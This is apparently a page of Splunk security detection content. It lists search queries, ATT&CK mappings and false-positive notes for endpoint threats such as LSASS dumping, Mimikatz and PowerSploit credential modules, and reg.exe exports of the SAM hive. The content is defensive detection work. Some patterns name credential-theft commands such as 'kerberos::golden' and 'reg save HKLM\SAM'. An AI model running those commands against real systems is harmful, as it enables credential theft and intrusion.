  • ATT&CK:
  • Last Updated: 2019-01-29

Search

| from datamodel Alerts.Alerts | search app=osquery:results (name=pack_osx-attacks_OSX_ColdRoot_RAT_Launchd OR name=pack_osx-attacks_OSX_ColdRoot_RAT_Files) | rename columns.path as path | bucket _time span=30s | stats count(path) by _time, host, user, path | `osquery_pack___coldroot_detection_filter`

Associated Analytic Story


How To Implement

In order to properly run this search, Splunk needs to ingest data from your deployed osquery agents with the [osx-attacks.conf](https://github.com/facebook/osquery/blob/experimental/packs/osx-attacks.conf#L599) pack enabled. The [TA-OSquery](https://github.com/d1vious/TA-osquery) must also be deployed across your indexers and universal forwarders in order for the osquery data to populate the Alerts data model.

Required field

Kill Chain Phase

  • Installation
  • Command and Control


Known False Positives

There are no known false positives.

Reference

Test Dataset

version: 1


Processes created by netsh

This search looks for processes launching netsh.exe to execute various commands via the netsh command-line utility. Netsh.exe is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh can be used as a persistence proxy technique to execute a helper .dll when netsh.exe is executed. In this search, we are looking for processes spawned by netsh.exe that are executing commands via the command line. Deprecated because we have another detection of the same type.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1562.004
  • Last Updated: 2020-11-23

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=netsh.exe by Processes.user Processes.dest Processes.parent_process Processes.parent_process_name Processes.process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `processes_created_by_netsh_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting logs with the process name, command-line arguments, and parent processes from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

| ID | Technique | Tactic |
| --- | --- | --- |
| T1562.004 | Disable or Modify System Firewall | Defense Evasion |


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It is unusual for netsh.exe to have any child processes in most environments. It makes sense to investigate the child process and verify whether the spawned process is legitimate. We explicitly exclude the "C:\Program Files\rempl\sedlauncher.exe" process path since it is a legitimate process by Microsoft.

Reference

Test Dataset

version: 5


Prohibited software on endpoint

This search looks for applications on the endpoint that you have marked as prohibited.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK:
  • Last Updated: 2019-10-11

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.dest Processes.user Processes.process_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `prohibited_softwares` | `prohibited_software_on_endpoint_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon. The data used for this search is usually generated via logs that report process tracking in your Windows audit settings. In addition, you must have only the `process_name` (not the entire process path) marked as "prohibited" in the Enterprise Security `interesting processes` table. To include the process names marked as "prohibited" that ship with ES Content Updates, run the included search Add Prohibited Processes to Enterprise Security.

Required field

Kill Chain Phase

  • Installation
  • Command and Control
  • Actions on Objectives


Known False Positives

None identified

Reference

Test Dataset

version: 2


Reg exe used to hide files directories via registry keys

The search looks for command-line arguments used to hide a file or directory using the reg add command.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1564.001
  • Last Updated: 2019-02-27

Search

| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = reg.exe Processes.process="*add*" Processes.process="*Hidden*" Processes.process="*REG_DWORD*" by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | regex process = "(/d\s+2)" | `reg_exe_used_to_hide_files_directories_via_registry_keys_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

| ID | Technique | Tactic |
| --- | --- | --- |
| T1564.001 | Hidden Files and Directories | Defense Evasion |


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None at the moment

Reference

Test Dataset

version: 2


Remote registry key modifications

This search monitors for remote modifications to registry keys.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-03-02

Search

| tstats `security_content_summariesonly` count values(Registry.registry_key_name) as registry_key_name values(Registry.registry_path) as registry_path min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path="\\\\*" by Registry.dest , Registry.user | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `remote_registry_key_modifications_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must populate the `Endpoint` data model. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry. Deprecated because I don't think the logic is right.

Required field

Kill Chain Phase

  • Actions on Objectives


Known False Positives

This technique may be legitimately used by administrators to modify remote registries, so it's important to filter these events out.

Reference

Test Dataset

version: 3


Remote wmi command attempt

This search looks for wmic.exe being launched with parameters to operate on remote systems.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1047
  • Last Updated: 2018-12-03

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wmic.exe AND Processes.process= */node* by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_wmi_command_attempt_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model. Deprecated because duplicate of Remote Process Instantiation via WMI.

Required field

ATT&CK

| ID | Technique | Tactic |
| --- | --- | --- |
| T1047 | Windows Management Instrumentation | Execution |


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators may use this legitimately to gather information from remote systems.

Reference

Test Dataset

version: 2


Scheduled tasks used in badrabbit ransomware

This search looks for flags passed to schtasks.exe on the command line that indicate that task names related to the execution of Bad Rabbit ransomware were created or deleted. Deprecated because we already have a similar detection.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1053.005
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process) as process from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe (Processes.process= "*create*" OR Processes.process= "*delete*") by Processes.parent_process Processes.process_name Processes.user | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | search (process=*rhaegal* OR process=*drogon* OR process=*viserion_*) | `scheduled_tasks_used_in_badrabbit_ransomware_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

| ID | Technique | Tactic |
| --- | --- | --- |
| T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation |


Kill Chain Phase

  • Actions on Objectives


Known False Positives

No known false positives

Reference

Test Dataset

version: 3


Splunk enterprise information disclosure

This search allows you to look for evidence of exploitation for CVE-2018-11409, a Splunk Enterprise Information Disclosure Bug.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2018-06-14

Search

index=_internal sourcetype=splunkd_ui_access server-info | search clientip!=127.0.0.1 uri_path="*raw/services/server/info/server-info" | rename clientip as src_ip, splunk_server as dest | stats earliest(_time) as firstTime, latest(_time) as lastTime, values(uri) as uri, values(useragent) as http_user_agent, values(user) as user by src_ip, dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_enterprise_information_disclosure_filter`

Associated Analytic Story


How To Implement

The REST endpoint that exposes system information is also necessary for the proper operation of Splunk clustering and instrumentation. Whitelisting your Splunk systems will reduce false positives.

Required field

Kill Chain Phase

  • Delivery


Known False Positives

Retrieving server information may be a legitimate API request. Verify that the attempt is a valid request for information.

Reference

Test Dataset

version: 1


Suspicious changes to file associations

This search looks for changes to registry values that control Windows file associations, executed by a process that is not typical for legitimate, routine changes to this area.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1546.001
  • Last Updated: 2020-07-22

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process_name) as process_name values(Processes.parent_process_name) as parent_process_name FROM datamodel=Endpoint.Processes where Processes.process_name!=Explorer.exe AND Processes.process_name!=OpenWith.exe by Processes.process_id Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join [ | tstats `security_content_summariesonly` values(Registry.registry_path) as registry_path count FROM datamodel=Endpoint.Registry where Registry.registry_path=*\\Explorer\\FileExts* by Registry.process_id Registry.dest | `drop_dm_object_name("Registry")` | table process_id dest registry_path] | `suspicious_changes_to_file_associations_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting information on registry changes that includes the name of the process responsible for the changes from your endpoints into the `Endpoint` data model in the `Processes` and `Registry` nodes.

Required field

ATT&CK

| ID | Technique | Tactic |
| --- | --- | --- |
| T1546.001 | Change Default File Association | Persistence, Privilege Escalation |


Kill Chain Phase

  • Actions on Objectives


Known False Positives

There may be other processes in your environment that users may legitimately use to modify file associations. If this is the case and you are finding false positives, you can modify the search to add those processes as exceptions.

Reference

Test Dataset

version: 4


Suspicious file write

The search looks for files created with names that have been linked to malicious activity.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2019-04-25

Search

| tstats `security_content_summariesonly` count values(Filesystem.action) as action values(Filesystem.file_path) as file_path min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem by Filesystem.file_name Filesystem.dest | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Filesystem)` | `suspicious_writes` | `suspicious_file_write_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint Filesystem data model node. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or via other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file system reads and writes. In addition, this search leverages an included lookup file that contains the names of the files to watch for, as well as a note explaining why each file name is being monitored. This lookup file can be edited to add or remove the file names you want to monitor.

Required field

Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's possible for a legitimate file to be created with the same name as one noted in the lookup file. Filenames listed in the lookup file should be unique enough that collisions are rare. Looking at the location of the file and the process responsible for the activity can help determine whether or not the activity is legitimate.

Reference

Test Dataset

version: 3


Suspicious writes to system volume information

This search detects writes to the 'System Volume Information' folder by something other than the System process.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1036
  • Last Updated: 2020-07-22

Search

(`sysmon` OR tag=process) EventCode=11 process_id!=4 file_path=*System\ Volume\ Information* | stats count min(_time) as firstTime max(_time) as lastTime by dest, Image, file_path | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_writes_to_system_volume_information_filter`

Associated Analytic Story


How To Implement

You need to be ingesting logs with both the process name and command-line from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

| ID | Technique | Tactic |
| --- | --- | --- |
| T1036 | Masquerading | Defense Evasion |


Kill Chain Phase

Known False Positives

It is possible that other utilities or system processes may legitimately write to this folder. Investigate and modify the search to include exceptions as appropriate.

Reference

Test Dataset

version: 2


Uncommon processes on endpoint

This search looks for applications on the endpoint that you have marked as uncommon.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1204.002
  • Last Updated: 2020-07-22

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.dest Processes.user Processes.process Processes.process_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `uncommon_processes` |`uncommon_processes_on_endpoint_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model. This search uses a lookup file `uncommon_processes_default.csv` to track various features of process names that are usually uncommon in most environments. Please consider updating `uncommon_processes_local.csv` to hunt for processes that are uncommon in your environment.

Required field

ATT&CK

| ID | Technique | Tactic |
| --- | --- | --- |
| T1204.002 | Malicious File | Execution |


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified

Reference

Test Dataset

version: 4


Unsigned image loaded by lsass

This search detects loading of unsigned images by LSASS. Deprecated because too noisy.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2019-12-06

Search

`sysmon` EventID=7 Image=*lsass.exe Signed=false | stats count min(_time) as firstTime max(_time) as lastTime by Computer, Image, ImageLoaded, Signed, SHA1 | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `unsigned_image_loaded_by_lsass_filter`

Associated Analytic Story


How To Implement

This search needs Sysmon Logs with a sysmon configuration, which includes EventCode 7 with lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.

Required field

ATT&CK

| ID | Technique | Tactic |
| --- | --- | --- |
| T1003.001 | LSASS Memory | Credential Access |


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Other tools could load images into LSASS for legitimate reasons, but enterprise tools should always use signed DLLs.

Reference


Test Dataset

version: 1


Unsuccessful netbackup backups

This search gives you the hosts where a backup was attempted and then failed.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2017-09-12

Search

`netbackup` | stats latest(_time) as latestTime by COMPUTERNAME, MESSAGE | search MESSAGE="An error occurred, failed to backup." | `security_content_ctime(latestTime)` | rename COMPUTERNAME as dest, MESSAGE as signature | table latestTime, dest, signature | `unsuccessful_netbackup_backups_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to obtain data from your backup solution, either from the backup logs on your endpoints or from a central server responsible for performing the backups. If you do not use Netbackup, you can modify this search for your specific backup solution.

Required field

Kill Chain Phase

Known False Positives

None identified

Reference

Test Dataset

version: 1


Windows disableantispyware registry

The search looks for the Registry Key DisableAntiSpyware set to disable. This is consistent with Ryuk infections across a fleet of endpoints.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1562.001
  • Last Updated: 2020-11-06

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Registry where Registry.registry_key_name="DisableAntiSpyware" AND Registry.registry_value_name="DWORD (0x00000000)" by Registry.dest Registry.user Registry.registry_path Registry.registry_value_name | `drop_dm_object_name(Registry)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `windows_disableantispyware_registry_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the process-system activity from your hosts to populate the Endpoint Processes data-model object. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.

Required field

ATT&CK

| ID | Technique | Tactic |
| --- | --- | --- |
| T1562.001 | Disable or Modify Tools | Defense Evasion |


Kill Chain Phase

  • Delivery


Known False Positives

It is unusual to turn this feature off on a Windows system since it is a default security control, although it is not rare for some policies to disable it. Although no false positives have been identified, use the provided filter macro to tune the search.

Reference

Test Dataset

version: 1


Windows connhost exe started forcefully

The search looks for the Console Window Host process (conhost.exe) executed using the force flag -ForceV1. This is not regular behavior in the Windows OS and is often seen executed by the Ryuk ransomware. DEPRECATED: This event is actually seen in the Windows 10 client of attack_range_local. After further testing we realized this is not specific to Ryuk.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1059.003
  • Last Updated: 2020-11-06

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes WHERE Processes.process="*C:\\Windows\\system32\\conhost.exe* 0xffffffff *-ForceV1*" by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_connhost_exe_started_forcefully_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the process-system activity from your hosts to populate the Endpoint Processes data-model object. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.

Required field

ATT&CK

| ID | Technique | Tactic |
| --- | --- | --- |
| T1059.003 | Windows Command Shell | Execution |


Kill Chain Phase

  • Delivery


Known False Positives

This process should not be run forcefully; we have not seen any false positives for this detection.

Reference

Test Dataset

version: 1


Windows hosts file modification

The search looks for modifications to the hosts file on all Windows endpoints across your environment.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2018-11-02

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem by Filesystem.file_name Filesystem.file_path Filesystem.dest | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | search Filesystem.file_name=hosts AND Filesystem.file_path=*Windows\\System32\\* | `drop_dm_object_name(Filesystem)` | `windows_hosts_file_modification_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records the file-system activity from your hosts to populate the Endpoint.Filesystem data model node. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or by other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file-system reads and writes.

Required field

Kill Chain Phase

  • Command and Control


Known False Positives

There may be legitimate reasons for system administrators to add entries to this file.

Reference

Test Dataset

version: 1



Endpoint

Access lsass memory for dump creation

Detect memory dumping of the LSASS process.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2019-12-06

Search

`sysmon` EventCode=10 TargetImage=*lsass.exe (CallTrace=*dbgcore.dll* OR CallTrace=*dbghelp.dll*) | stats count min(_time) as firstTime max(_time) as lastTime by Computer, TargetImage, TargetProcessId, SourceImage, SourceProcessId | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `access_lsass_memory_for_dump_creation_filter`

Associated Analytic Story


How To Implement

This search requires Sysmon Logs and a Sysmon configuration, which includes EventCode 10 for lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators can create memory dumps for debugging purposes, but memory dumps of the LSASS process would be unusual.

Reference


Test Dataset


version: 2


Applying stolen credentials via mimikatz modules

This detection indicates use of Mimikatz modules that facilitate Pass-the-Token attacks, Golden or Silver Kerberos ticket attacks, and Skeleton Key attacks.

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)kerberos::ptt/)=true OR match_regex(cmd_line, /(?i)kerberos::golden/)=true OR match_regex(cmd_line, /(?i)kerberos::silver/)=true OR match_regex(cmd_line, /(?i)misc::skeleton/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command-line logging enabled.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1055 Process Injection Defense Evasion, Privilege Escalation
T1068 Exploitation for Privilege Escalation Privilege Escalation
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1098 Account Manipulation Persistence
T1134 Access Token Manipulation Defense Evasion, Privilege Escalation
T1543 Create or Modify System Process Persistence, Privilege Escalation
T1547 Boot or Logon Autostart Execution Persistence, Privilege Escalation
T1548 Abuse Elevation Control Mechanism Defense Evasion, Privilege Escalation
T1554 Compromise Client Software Binary Persistence
T1556 Modify Authentication Process Credential Access, Defense Evasion
T1558 Steal or Forge Kerberos Tickets Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Applying stolen credentials via powersploit modules

Stolen credentials are applied by methods such as user impersonation, credential injection, spoofing of authentication processes, or getting hold of critical accounts. This detection indicates such activities carried out via PowerSploit exploit-kit APIs.

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Invoke-CredentialInjection/)=true OR match_regex(cmd_line, /(?i)Invoke-TokenManipulation/)=true OR match_regex(cmd_line, /(?i)Invoke-UserImpersonation/)=true OR match_regex(cmd_line, /(?i)Get-System/)=true OR match_regex(cmd_line, /(?i)Invoke-RevertToSelf/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command-line logging enabled.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1055 Process Injection Defense Evasion, Privilege Escalation
T1068 Exploitation for Privilege Escalation Privilege Escalation
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1098 Account Manipulation Persistence
T1134 Access Token Manipulation Defense Evasion, Privilege Escalation
T1543 Create or Modify System Process Persistence, Privilege Escalation
T1547 Boot or Logon Autostart Execution Persistence, Privilege Escalation
T1548 Abuse Elevation Control Mechanism Defense Evasion, Privilege Escalation
T1554 Compromise Client Software Binary Persistence
T1556 Modify Authentication Process Credential Access, Defense Evasion
T1558 Steal or Forge Kerberos Tickets Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Assessment of credential strength via dsinternals modules

This detection identifies use of DSInternals modules that verify password strength, i.e., identify weak accounts that would be easily compromised.

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Test-PasswordQuality/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command-line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1098 Account Manipulation Persistence
T1087 Account Discovery Discovery
T1201 Password Policy Discovery Discovery
T1552 Unsecured Credentials Credential Access
T1555 Credentials from Password Stores Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Attempt to add certificate to untrusted store

Attempt to add a certificate to the certificate store

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1553.004
  • Last Updated: 2020-11-03

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=*certutil* (Processes.process=*-addstore*) by Processes.parent_process Processes.process_name Processes.user | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `attempt_to_add_certificate_to_untrusted_store_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1553.004 Install Root Certificate Defense Evasion


Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

There may be legitimate reasons for administrators to add a certificate to the untrusted certificate store. In such cases, this will typically be done on a large number of systems.

Reference

Test Dataset


version: 6


Attempt to set default powershell execution policy to unrestricted or bypass

Monitor for changes of the ExecutionPolicy in the registry to the values "unrestricted" or "bypass," which allows the execution of malicious scripts.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.001
  • Last Updated: 2020-11-06

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Registry where Registry.registry_path=*Software\\Microsoft\\Powershell\\1\\ShellIds\\Microsoft.PowerShell* Registry.registry_key_name=ExecutionPolicy (Registry.registry_value_name=Unrestricted OR Registry.registry_value_name=Bypass) by Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.dest | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `attempt_to_set_default_powershell_execution_policy_to_unrestricted_or_bypass_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Registry node. You must also be ingesting logs with the fields registry_path, registry_key_name, and registry_value_name from your endpoints.

Required field

ATT&CK

ID Technique Tactic
T1059.001 PowerShell Execution


Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

Administrators may attempt to change the default execution policy on a system for a variety of reasons. However, setting the policy to "unrestricted" or "bypass", as this search is designed to identify, would be unusual. Hits should be reviewed and investigated as appropriate.

Reference

Test Dataset


version: 6


Attempt to stop security service

This search looks for attempts to stop security-related services on the endpoint.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1562.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = net.exe OR Processes.process_name = sc.exe) Processes.process="* stop *" by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | lookup security_services_lookup service as process OUTPUTNEW category, description | search category=security | `attempt_to_stop_security_service_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the file-system activity from your hosts to populate the Endpoint file-system data-model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data. The search is shipped with a lookup file, `security_services.csv`, that can be edited to update the list of services to monitor. This lookup file can be edited directly where it lives in `$SPLUNK_HOME/etc/apps/DA-ESS-ContentUpdate/lookups`, or via the Splunk console. You should add the names of services an attacker might use on the command line and surround them with asterisks (`*`), so that they match properly when searching the command line. The file should be updated with the names of any services you would like to monitor for attempts to stop the service.

Required field

ATT&CK

ID Technique Tactic
T1562.001 Disable or Modify Tools Defense Evasion


Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

None identified. Attempts to disable security-related services should be identified and understood.

Reference

Test Dataset


version: 3


Attempted credential dump from registry via reg exe

Monitor for execution of reg.exe with parameters specifying an export of keys that contain hashed credentials that attackers may try to crack offline.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.002
  • Last Updated: 2019-12-02

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=reg.exe OR Processes.process_name=cmd.exe) Processes.process=*save* (Processes.process=*HKEY_LOCAL_MACHINE\\Security* OR Processes.process=*HKEY_LOCAL_MACHINE\\SAM* OR Processes.process=*HKEY_LOCAL_MACHINE\\System* OR Processes.process=*HKLM\\Security* OR Processes.process=*HKLM\\System* OR Processes.process=*HKLM\\SAM*) by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `attempted_credential_dump_from_registry_via_reg_exe_filter`

Associated Analytic Story


How To Implement

